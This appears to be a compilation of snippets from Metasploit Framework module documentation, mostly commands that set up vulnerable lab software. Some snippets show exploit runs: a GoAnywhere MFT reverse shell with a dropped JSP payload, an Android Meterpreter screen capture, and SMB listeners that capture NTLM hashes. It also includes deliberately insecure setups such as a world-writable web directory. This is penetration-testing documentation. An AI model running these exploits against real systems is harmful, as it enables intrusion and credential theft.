### Install and Start FTP Server (vsftpd)

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md

Installs vsftpd and ensures it starts automatically on boot.

```bash
sudo apt install -y vsftpd
sudo systemctl start vsftpd
sudo systemctl enable vsftpd
```

--------------------------------

### Install and Start Apache Web Server

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md

Installs Apache2 and ensures it starts automatically on boot.

```bash
sudo apt install -y apache2
sudo systemctl start apache2
sudo systemctl enable apache2
```

--------------------------------

### Ubuntu Setup: Start CouchDB Server

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md

Starts the CouchDB server as the 'couchdb' user.

```bash
sudo -i -u couchdb couchdb/bin/couchdb
```

--------------------------------

### GoAhead Installation and Setup

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/goahead_ldpreload.md

These commands outline the steps to clone the GoAhead repository, check out a specific vulnerable version, compile it, and start the server for testing.

```bash
git clone https://github.com/embedthis/goahead.git
cd goahead/
git checkout tags/v3.6.4 -q
make > /dev/null
cd test
gcc ./cgitest.c -o cgi-bin/cgitest
../build/linux-x64-default/bin/goahead . 127.1.1.1:8080
```

--------------------------------

### UniData Installation and Service Start

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/misc/unidata_udadmin_password_stack_overflow.md

Demonstrates the steps to install UniData from a zip file, extract the tar archive, and set up environment variables to run the service.

```bash
[ron@unidata unidata]$ unzip Unidata\ Personal\ X86_8.2.4.3001.zip
Archive:  Unidata Personal X86_8.2.4.3001.zip
  inflating: bin.tar
  inflating: UniData_Hotfix_V824_3001.pdf
  inflating: UniData_Release_Notes_v824.pdf
[ron@unidata unidata]$ tar -xf bin.tar
[ron@unidata unidata]$ sudo ./udtsetup
[default options, set directories]
CheckLang       Yes
CheckPerms      No
Group           sys
InstallXDEMO    Yes
LibDir          /home/ron/unidata/unidata/lib
Startud         Yes
UdtBin          /home/ron/unidata/unidata/bin
UdtHome         /home/ron/unidata/unidata
UnisharedDir    /home/ron/unidata/unishared
WorkDir         /home/ron/unidata/unidata/work
```

```bash
# export UDTBIN=/home/ron/unidata/unidata/bin
# export UDTHOME=/home/ron/unidata/unidata
# export PATH=$PATH:$UDTBIN
# export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$UDTBIN
# export LANG=C
# startud
```

--------------------------------

### Start minikube

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/eclipse_che_machine_exec_rce.md

Starts a minikube instance with specified resources. This command requires minikube to be installed.

```bash
minikube start --driver=docker \
  --memory=4096 \
  --cpus=2 \
  --disk-size=20g
```

--------------------------------

### Start Metasploit Database and Web Service

Source: https://github.com/rapid7/metasploit-framework/blob/master/docs/metasploit-framework.wiki/Metasploit-Web-Service.md

Use this command to start both the Metasploit database and the web service. This is typically done during initial setup.

```bash
msfdb start
```

--------------------------------

### Ubuntu Setup: Install Dependencies

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md

Installs necessary packages for building and running CouchDB on Ubuntu.

```bash
sudo apt-get --no-install-recommends -y install \
  build-essential pkg-config erlang erlang-reltool \
  libicu-dev libmozjs-68-dev python3
sudo apt-get -y install pip sphinx-doc sphinx-common
sudo pip install --upgrade sphinx_rtd_theme nose requests hypothesis
```

--------------------------------

### Start Jenkins Server

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/jenkins_cli_deserialization.md

To start a Jenkins server, navigate to the location of the downloaded `war` file and execute this command. A JDK must be installed on the target system.

```bash
java -jar .war
```

--------------------------------

### ViciBox Installer Output Example

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/vicidial_sql_enum_users_pass.md

This output shows the interactive prompts and system responses during the ViciBox installation process. It highlights configuration choices, potential warnings, and the final summary.

```bash
vicibox11:~ # vicibox-install --legacy
ViciBox Installer
Legacy mode activated
Use of uninitialized value $string in substitution (s///) at /usr/local/bin/vicibox-install line 137.
Use of uninitialized value $string in substitution (s///) at /usr/local/bin/vicibox-install line 138.
Use of uninitialized value $string in substitution (s///) at /usr/local/bin/vicibox-install line 137.
Use of uninitialized value $string in substitution (s///) at /usr/local/bin/vicibox-install line 138.

The installer will ask questions based upon the role that this server is to provide for the ViciBox Call Center Suite. You should have the database and optionally archive servers setup prior to installing any other servers. The installer will not run without there being a configured database! If this server is to be the database then it must be installed before the archive server.

Verify that all servers are connected to the same network and have connectivity to each other before continuing. This installer will be destructive to the server if it is run.

Do you want to continue with the ViciBox install? [y/N] : y
Do you want to enable expert installation? [y/N] :
The Internal IP address found was 192.168.1.4.
Do you want to use this IP address for ViciDial? [Y/n] : y
Will this server be used as the Database? [y/N] : y
Do you want to use the default ViciDial DB settings? [Y/n] : y
Will this server be used as a Web server? [y/N] : y
Will this server be used as a Telephony server? [y/N] : y
Will this server be used as an Archive server? [y/N] : y
Archive server IP (192.168.1.4) :
Archive FTP User (cronarchive) :
Archive FTP Password (archive1234) :
Archive FTP Port (21) :
Archive FTP Directory () :
Archive URL (http://192.168.1.4/archive/) :
Use of uninitialized value $localsvn in concatenation (.) or string at /usr/local/bin/vicibox-install line 1513, line 14.
The local SVN is build 240419-1817 version 2.14-916a from SVN
Do you want to use the ViciDial version listed above? [Y/n] : y
Do you want to disable the built-in firewall? [y/N] : y

--- ViciBox Install Summary ---
Expert   : No
Legacy   : Yes
Database : Yes
Web      : Yes
Telephony: Yes
First Srv: Yes
Have Arch: No
Archive  : Yes
Firewall : Disabled

--- Configuration Information ---
- Database -
Use of uninitialized value $DBsvnrev in concatenation (.) or string at /usr/local/bin/vicibox-install line 1609, line 16.
SVN Rev  :
IP Addr  : 192.168.1.4
Name     : asterisk
User     : cron
Password : 1234
Cust User: custom
Cust Pass: custom1234
Port     : 3306

Please verify the above information before continuing!
Do you want to continue the installation? [y/N] : y
Beginning installation, expect lots of output...
Disabling firewall...
Removed /etc/systemd/system/multi-user.target.wants/firewalld.service.
Removed /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.service.
Use of uninitialized value $DBsvnrev in numeric ne (!=) at /usr/local/bin/vicibox-install line 208, line 17.
Use of uninitialized value $localsvn in numeric ne (!=) at /usr/local/bin/vicibox-install line 208, line 17.
Use of uninitialized value $DBsvnrev in concatenation (.) or string at /usr/local/bin/vicibox-install line 218, line 17.
Local SVN revision matches DB revision:
Doing general DataBase requirements...
Doing Master-specific MySQL setup...
Configuring Web Server...
Created symlink /etc/systemd/system/httpd.service → /usr/lib/systemd/system/apache2.service.
Created symlink /etc/systemd/system/apache.service → /usr/lib/systemd/system/apache2.service.
Created symlink /etc/systemd/system/multi-user.target.wants/apache2.service → /usr/lib/systemd/system/apache2.service.
Configuring Telephony Server...
Configuring Archive Server...
Nouveau mot de passe :
MOT DE PASSE INCORRECT : trop simple/systématique
Retapez le nouveau mot de passe :
passwd: password updated successfully
Created symlink /etc/systemd/system/multi-user.target.wants/vsftpd.service → /usr/lib/systemd/system/vsftpd.service.
Loading GMT and Phone Codes...
Seeding the audio store, this may take a while...

PLEASE use secure passwords inside vicidial. It prevents hackers and other undesirables from compromising your system and costing you thousands in toll fraud and long distance. A secure password Contains at least one capital letter and one number. A good example of a secure password would be NrWZDqL1Rg37uuC. Don't feed the black market, secure your systems properly!

System should be installed. Please type 'reboot' to cleanly load everything.
```

--------------------------------

### Trixbox CE Installation and Setup

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce.md

Instructions for setting up a vulnerable Trixbox CE environment for testing.
This includes downloading the ISO, installing it on a virtual machine, and accessing the web GUI.

```bash
CentOS release 4.3 (Final)
Kernel 2.6.9-34.EL on an i686

asterisk1 login:
```

```bash
For access to the trixbox web GUI use this URL:
http://192.168.205.144
```

--------------------------------

### Kaltura Installation Prompts

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/kaltura_unserialize_rce.md

This example displays the interactive prompts encountered during a Kaltura installation. It shows the various configuration options that need to be provided, some of which could be leveraged in an exploit.

```bash
[Email\NO]: ""
CDN hostname [kalrpm.lcl]: ""
Apache virtual hostname [kalrpm.lcl]: ""
Which port will this Vhost listen on [80]?:
DB hostname [127.0.0.1]: "<127.0.0.1>"
DB port [3306]: "<3306>"
MySQL super user [this is only for setting the kaltura user passwd and WILL NOT be used with the application]: ""
MySQL super user passwd [this is only for setting the kaltura user passwd and WILL NOT be used with the application]: ""
Analytics DB hostname [127.0.0.1]: "<127.0.0.1>"
Analytics DB port [3306]: "<3306>"
Sphinx hostname [127.0.0.1]: "<127.0.0.1>"
Secondary Sphinx hostname: [leave empty if none] ""
VOD packager hostname [kalrpm.lcl]: ""
VOD packager port to listen on [88]:
Service URL [http://kalrpm.lcl:80]: ""
Kaltura Admin user (email address): ""
Admin user login password (must be minimum 8 chars and include at least one of each: upper-case, lower-case, number and a special character): ""
Confirm passwd: ""
Your time zone [see http://php.net/date.timezone], or press enter for [Europe/Amsterdam]: ""
How would you like to name your system (this name will show as the From field in emails sent by the system) [Kaltura Video Platform]? ""
Your website Contact Us URL [http://corp.kaltura.com/company/contact-us]: ""
'Contact us' phone number [+1 800 871 5224]? ""
Is your Apache working with SSL?[Y/n] ""
It is recommended that you do work using HTTPs. Would you like to continue anyway?[N/y] ""
Which port will this Vhost listen on? [80] "<80>"
Please select one of the following options [0]: "<0>"
```

--------------------------------

### Retrieve Install Key

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/linux/gather/rancher_audit_log_leak.md

After starting the Rancher Docker container, use this command to retrieve the bootstrap password, which is necessary for initial setup.

```bash
docker logs 2>&1 | grep "Bootstrap Password:"
```

--------------------------------

### Vagrant Project Setup and VM Boot

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout.md

This example demonstrates the basic commands to initialize a Vagrant project and bring up a virtual machine. It shows the output of the `vagrant up` command, including box download, VM import, network configuration, and shared folder mounting.

```bash
$ mkdir vagrant_getting_started
$ cd vagrant_getting_started/
$ vagrant init hashicorp/bionic64
A `Vagrantfile` has been placed in this directory. You are now
ready to `vagrant up` your first virtual environment! Please read
the comments in the Vagrantfile as well as documentation on
`vagrantup.com` for more information on using Vagrant.
$ vagrant up
Bringing machine 'default' up with 'virtualbox' provider...
==> default: Box 'hashicorp/bionic64' could not be found. Attempting to find and install...
    default: Box Provider: virtualbox
    default: Box Version: >= 0
==> default: Loading metadata for box 'hashicorp/bionic64'
    default: URL: https://vagrantcloud.com/hashicorp/bionic64
==> default: Adding box 'hashicorp/bionic64' (v1.0.282) for provider: virtualbox
    default: Downloading: https://vagrantcloud.com/hashicorp/boxes/bionic64/versions/1.0.282/providers/virtualbox.box
==> default: Successfully added box 'hashicorp/bionic64' (v1.0.282) for 'virtualbox'!
==> default: Importing base box 'hashicorp/bionic64'...
==> default: Matching MAC address for NAT networking...
==> default: Checking if box 'hashicorp/bionic64' version '1.0.282' is up to date...
==> default: Setting the name of the VM: vagrant_getting_started_default_1664845773160_64119
==> default: Clearing any previously set network interfaces...
==> default: Preparing network interfaces based on configuration...
    default: Adapter 1: nat
==> default: Forwarding ports...
    default: 22 (guest) => 2222 (host) (adapter 1)
==> default: Booting VM...
==> default: Waiting for machine to boot. This may take a few minutes...
    default: SSH address: 127.0.0.1:2222
    default: SSH username: vagrant
    default: SSH auth method: private key
    default: Warning: Connection reset. Retrying...
    default:
    default: Vagrant insecure key detected. Vagrant will automatically replace
    default: this with a newly generated keypair for better security.
    default:
    default: Inserting generated public key within guest...
    default: Removing insecure key from the guest if it's present...
    default: Key inserted! Disconnecting and reconnecting using new SSH key...
==> default: Machine booted and ready!
==> default: Checking for guest additions in VM...
    default: The guest additions on this VM do not match the installed version of
    default: VirtualBox! In most cases this is fine, but in rare cases it can
    default: prevent things such as shared folders from working properly. If you see
    default: shared folder errors, please make sure the guest additions within the
    default: virtual machine match the version of VirtualBox you have installed on
    default: your host and reload your VM.
    default:
    default: Guest Additions Version: 6.0.10
    default: VirtualBox Version: 6.1
==> default: Mounting shared folders...
    default: /vagrant => /home/user/vagrant/vagrant_getting_started
```

--------------------------------

### Setup and Exploit Execution Script

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/wp_ai_engine_mcp_rce.md

This bash script automates the setup process, including starting Docker containers, installing WP-CLI, configuring WordPress, and activating the AI Engine plugin with a generated bearer token.

```bash
docker compose up -d
sleep 5
docker exec wp-ai-engine-lab bash -c "curl -O https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar && chmod +x wp-cli.phar && mv wp-cli.phar /usr/local/bin/wp"
docker exec wp-ai-engine-lab wp core install --path='/var/www/html' --url='http://localhost:5555' --title='Exploit Market' --admin_user='admin' --admin_password='admin' --admin_email='admin@example.com' --allow-root
docker exec wp-ai-engine-lab wp rewrite structure '/%postname%/' --path='/var/www/html' --allow-root
docker exec wp-ai-engine-lab wp rewrite flush --path='/var/www/html' --allow-root
docker exec wp-ai-engine-lab wp config set FS_METHOD direct --path='/var/www/html' --allow-root
docker exec wp-ai-engine-lab chown -R www-data:www-data /var/www/html/wp-content
docker exec -u www-data wp-ai-engine-lab wp plugin install ai-engine --version=3.1.3 --path='/var/www/html' --activate --force
BEARER_TOKEN=$(openssl rand -base64 32 | tr -d "=+/" | cut -c1-43)
# The option value must reach wp-cli as valid JSON, so the inner quotes are backslash-escaped for bash
docker exec -u www-data wp-ai-engine-lab wp option update mwai_options --format=json --path='/var/www/html' "{\"module_mcp\":true,\"mcp_core\":true,\"mcp_bearer_token\":\"${BEARER_TOKEN}\",\"mcp_noauth_url\":true}"
echo "Bearer Token: ${BEARER_TOKEN}"
```

--------------------------------

### Set up web server directory

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/ftp/proftpd_modcopy_exec.md

Install PHP and Apache, create a world-writable directory for the web server.

```sh
sudo apt install php apache2
# Both commands target the same directory under the Apache document root
sudo mkdir /var/www/html/test
sudo chmod 777 /var/www/html/test
```

--------------------------------

### Setup SPIP Directory and Unzip

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/spip_connect_exec.md

Create a directory for SPIP, copy the archive, and unzip it.

```bash
mkdir spip-site
cp SPIP-v2-0-0.zip spip-site/
cd spip-site/
unzip SPIP-v2-0-0.zip
```

--------------------------------

### Ray Installation and Docker Setup

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/ray_agent_job_rce.md

Steps to install and run the vulnerable Ray v2.6.3 using Docker. This involves pulling the specific Docker image and starting the Ray container with appropriate port mappings and shared memory size.

```bash
docker pull rayproject/ray:2.6.3
```

```bash
docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3
```

```bash
ray start --head --dashboard-host=0.0.0.0
```

--------------------------------

### Full Python Metasploit Module Example

Source: https://github.com/rapid7/metasploit-framework/blob/master/docs/metasploit-framework.wiki/Writing-External-Python-Modules.md

This example demonstrates a complete Python module for Metasploit, including metadata definition, dependency checking for the 'requests' library, and the 'run' function to perform an HTTP GET request and log the response. It requires the 'requests' library to be installed.

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# standard modules
import logging

# extra modules
dependencies_missing = False
try:
    import requests
except ImportError:
    dependencies_missing = True

from metasploit import module


metadata = {
    'name': 'Python Module Example',
    'description': '''
        Python communication with msfconsole.
    ''',
    'authors': [
        'Jacob Robles'
    ],
    'date': '2018-03-22',
    'license': 'MSF_LICENSE',
    'references': [
        {'type': 'url', 'ref': 'https://blog.rapid7.com/2017/12/28/regifting-python-in-metasploit/'},
        {'type': 'aka', 'ref': 'Coldstone'}
    ],
    'type': 'single_scanner',
    'options': {
        'targeturi': {'type': 'string', 'description': 'The base path', 'required': True, 'default': '/'},
        'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': None}
    }
}


def run(args):
    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
    if dependencies_missing:
        logging.error('Module dependency (requests) is missing, cannot continue')
        return

    # Your code here
    try:
        r = requests.get('https://{}/{}'.format(args['rhost'], args['targeturi']), verify=False)
    except requests.exceptions.RequestException as e:
        logging.error('{}'.format(e))
        return

    logging.info('{}...'.format(r.text[0:50]))


if __name__ == '__main__':
    module.run(metadata, run)
```

--------------------------------

### PivotX Installation Steps

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/pivotx_index_php_overwrite.md

Follow these steps to install PivotX and prepare the environment for exploitation.

```bash
git clone https://github.com/pivotx/PivotX.git
```

```bash
sudo chown -R www-data:www-data ./
```

--------------------------------

### Example bootparams file configuration

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/gather/nis_bootparamd_domain.md

This is an example of how the `/etc/bootparams` file should be configured on a server to provide boot information to clients.

```plaintext
clientname root=nfsserver:/export/clientname/root
```

--------------------------------

### Setup Vulnerable Craft CMS with DDEV

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/craftcms_ftp_template.md

This script uses DDEV to configure and start a Craft CMS project, install a specific vulnerable version (5.5.0), set up the security key, install Craft CMS with default credentials, and enable 'register_argc_argv' for PHP. It then restarts DDEV and launches the project.

```bash
mkdir exploit-craft && \
cd exploit-craft && \
# Configure DDEV (https://ddev.com/) project for Craft CMS \
ddev config \
  --project-type=craftcms \
  --docroot=web \
  --create-docroot \
  --php-version="8.2" \
  --database="mysql:8.0" \
  --nodejs-version="20" && \
# Create the DDEV project
ddev start -y && \
# Create Craft CMS with the specified version
ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \
# Install a vulnerable Craft CMS version
ddev composer require "craftcms/cms:5.5.0" \
  --no-scripts \
  --no-interaction --with-all-dependencies && \
# Set the security key for Craft CMS
ddev craft setup/security-key && \
# Install Craft CMS
ddev craft install/craft \
  --username=admin \
  --password=password123 \
  --email=admin@example.com \
  --site-name=Testsite \
  --language=en \
  --site-url='$DDEV_PRIMARY_URL' && \
# Enable register_argc_argv for PHP
mkdir -p .ddev/php/ && \
echo "register_argc_argv = On" > .ddev/php/php.ini && \
ddev restart && \
# Launch the project
echo 'Setup complete. Launching the project.' && \
ddev launch
```

--------------------------------

### Start Splunk Service

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/splunk_auth_rce_cve_2024_36985.md

Start the Splunk Enterprise service after installation. This command assumes the default installation path.

```bash
/opt/splunk/bin/splunk start
```

--------------------------------

### Running the GetGo Exploit Module

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md

This example shows how to initiate the exploit module and the expected output when it starts, including the generated URL and server status.

```bash
msf exploit(windows/browser/getgodm_http_response_bof) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.12:4444
msf exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3
[*] Local IP: http://192.168.0.12:8080/shakeitoff.mp3
[*] Server started.
```

--------------------------------

### HTTP GET Request Example

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/title.md

An example of an HTTP GET request sent to a web server, including standard headers.

```http
GET / HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```

--------------------------------

### Example of Running the Module

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/android/capture/screen.md

This scenario demonstrates the typical workflow of gaining root access and then running the screen capture module. The output shows the session being backgrounded, the module being used, and the screenshot being saved.

```msfconsole
msf exploit(android/local/futex_requeue) > run

[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/cbvzt
[*] Loaded library /data/data/com.metasploit.stage/files/cbvzt, deleting
[*] Waiting 300 seconds for payload
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 4 opened (111.111.1.111:4444 -> 222.222.2.222:58577) at 2019-10-22 16:04:31 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > background
[*] Backgrounding session 4...
msf exploit(android/local/futex_requeue) > use post/android/capture/screen
msf post(android/capture/screen) > set session 4
session => 4
msf post(android/capture/screen) > run

[!] SESSION may not be compatible with this module.
[+] Downloading screenshot...
[+] Screenshot saved at /root/.msf4/loot/20191022161242_default_222.222.2.222_screen_capture.s_496457.png
[*] Post module execution completed
```

--------------------------------

### Install and Start Memcached on CentOS

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/memcached/memcached_amp.md

Installs and starts the memcached service on a CentOS 7 system. It listens on 0.0.0.0 by default, making it accessible externally.

```bash
yum -y install memcached
systemctl start memcached
```

--------------------------------

### Setting up SMB Capture Server

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/fileformat/odt_badodt.md

Shows how to start the Metasploit auxiliary/server/capture/smb module to listen for and capture NTLM hashes.

```bash
$ sudo ./msfconsole
msf > use auxiliary/server/capture/smb
msf auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(server/capture/smb) >
[*] Server started.
msf auxiliary(server/capture/smb) >
```

--------------------------------

### Install PostgreSQL and Client

Source: https://github.com/rapid7/metasploit-framework/blob/master/docs/metasploit-framework.wiki/dev/Setting-Up-a-Metasploit-Development-Environment.md

Installs the PostgreSQL server and client packages on Debian-based systems. It also starts the PostgreSQL service and configures it to start on boot.

```bash
sudo apt update && sudo apt-get install -y postgresql postgresql-client
sudo service postgresql start && sudo update-rc.d postgresql enable
```

--------------------------------

### Set Up SMB Capture Listener

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/fileformat/environment_variable_datablock_leak.md

This example shows how to configure and start an SMB capture listener on the attacker machine. This listener will be used to capture the NTLM hashes when the victim interacts with the malicious LNK file.

```bash
msf > use auxiliary/server/capture/smb
msf auxiliary(server/capture/smb) > set SRVHOST 192.168.1.25
SRVHOST => 192.168.1.25
msf auxiliary(server/capture/smb) > run
[*] Server started.
```

--------------------------------

### Install MySQL Server on Ubuntu

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/gather/suite_crm_export_sqli.md

Installs and starts the MySQL server on Ubuntu 20.04. This is a prerequisite for installing SuiteCRM from source.

```bash
sudo apt update
sudo apt install mysql-server
sudo systemctl start mysql.service
```

--------------------------------

### Install MySQL 5.7

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md

Installs MySQL 5.7 on Ubuntu. The service should start automatically.

```bash
sudo apt -y install mysql-server-5.7
sudo systemctl start mysql
```

--------------------------------

### ClipBucket Installation Steps

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md

These commands detail the steps to download, unzip, and configure ClipBucket for exploitation.

```bash
wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip
```

```bash
unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip
```

```bash
mv clipbucket-4881/upload/* /var/www/html/
```

```bash
chown -R www-data:www-data /var/www/html/
```

--------------------------------

### PlaySMS Installation Steps

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/playsms_template_injection.md

Follow these steps to set up a vulnerable instance of PlaySMS. This includes downloading, extracting, configuring, and setting database credentials.

```bash
tar -xvf playsms-1.4.2.tar.gz
```

```bash
mv playsms-1.4.2/web/* /var/www/html/
```

```bash
cp /var/www/html/config-dist.php /var/www/html/config.php
```

```bash
chown -R www-data:www-data /var/www/html/
```

--------------------------------

### Install PHP Dependencies on Ubuntu

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.md

Installs necessary PHP extensions and MariaDB for GLPI. Ensure these are installed before proceeding with the GLPI setup.

```bash
sudo add-apt-repository ppa:ondrej/php
sudo apt install apache2 php8.3 php8.3-curl php8.3-zip php8.3-gd php8.3-intl \
  php8.3-intl php-pear php8.3-imagick php-bz2 php8.3-imap php-memcache php8.3-pspell \
  php8.3-tidy php8.3-xmlrpc php8.3-xsl php8.3-mbstring php8.3-ldap php-cas php-apcu \
  libapache2-mod-php8.3 php8.3-mysql mariadb-server
```

--------------------------------

### Installing UniData with Default Options

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/misc/unidata_udadmin_auth_bypass.md

Shows the interactive installation process for UniData using default options.

```bash
sudo ./udtsetup
[default options, set directories]
CheckLang       Yes
CheckPerms      No
Group           sys
InstallXDEMO    Yes
LibDir          /home/ron/unidata/unidata/lib
Startud         Yes
UdtBin          /home/ron/unidata/unidata/bin
UdtHome         /home/ron/unidata/unidata
UnisharedDir    /home/ron/unidata/unishared
WorkDir         /home/ron/unidata/unidata/work
```

--------------------------------

### Module Options and Execution Example

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204.md

Demonstrates the module's options, including RHOSTS, RPORT, SSL, TARGETURI, and payload options like LHOST and LPORT. Shows the output of the 'check' and 'exploit' commands, including successful account creation, OS detection, payload drop, and shell session opening.

```bash
msf exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > show options

Module options (exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.100.1.30      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-meta
                                         sploit.html
   RPORT      8001             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /goanywhere/     yes       The base path to the web application
   VHOST                       no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.100.1.10      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


View the full module info with the info, or info -d command.

msf exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > check
[*] 10.100.1.30:8001 - The target appears to be vulnerable. GoAnywhere MFT 7.4.0
msf exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > exploit
[*] Started reverse TCP handler on 10.100.1.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. GoAnywhere MFT 7.4.0
[*] Created account: uchvkpgt:ZindpxggDdvtrxu3
[*] Automatic targeting, detected OS: Linux
[*] Automatic targeting, detected install path: /opt/HelpSystems/GoAnywhere
[*] Dropped payload: /opt/HelpSystems/GoAnywhere/adminroot/EIlMlYdQ.jsp
[+] Deleted /opt/HelpSystems/GoAnywhere/adminroot/EIlMlYdQ.jsp
[!] Tried to delete /opt/HelpSystems/GoAnywhere/userdata/documents/uchvkpgt/EIlMlYdQ.jsp, unknown result
[+] Deleted /opt/HelpSystems/GoAnywhere/userdata/documents/uchvkpgt/
[*] Command shell session 4 opened (10.100.1.10:4444 -> 10.100.1.30:49572) at 2024-01-29 17:49:08 +0000

id
uid=1002(gamft) gid=1002(gamft) groups=1002(gamft)
pwd
/opt/HelpSystems/GoAnywhere
uname -a
Linux ubuntu-test-vm 6.5.0-15-generic #15~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Jan 12 18:54:30 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 10.100.1.30 - Command shell session 8 closed.
msf exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) >
```

--------------------------------

### Install WordPress Core

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/wp_acf_extended_rce.md

Installs WordPress core files and sets up the initial site using WP-CLI.

```bash
docker exec wp-acf-extended-lab wp core install \
  --path='/var/www/html' \
  --url='http://localhost:5557' \
  --title='Exploit Market' \
  --admin_user='admin' \
  --admin_password='admin' \
  --admin_email='admin@example.com' \
  --allow-root
```

--------------------------------

### Vagrantfile for Wing FTP Server Lab Setup

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/wingftp_null_byte_rce.md

This Vagrantfile provisions a Debian VM, installs Wing FTP Server 7.4.3, and configures port forwarding for access. It automates the installation and initial setup of the server.
```ruby
Vagrant.configure("2") do |config|
  config.vm.box = "debian/bookworm64"

  if Vagrant.has_plugin?("vagrant-vbguest")
    config.vbguest.auto_update = false
  end

  {
    21    => 2121,  # FTP
    990   => 2990,  # FTPS
    5466  => 5466,  # Admin port WingFTP
    50000 => 50000, # Passive FTP range start
    50050 => 50050, # Passive FTP range end
    80    => 8081   # HTTP WingFTP Web GUI
  }.each do |guest, host|
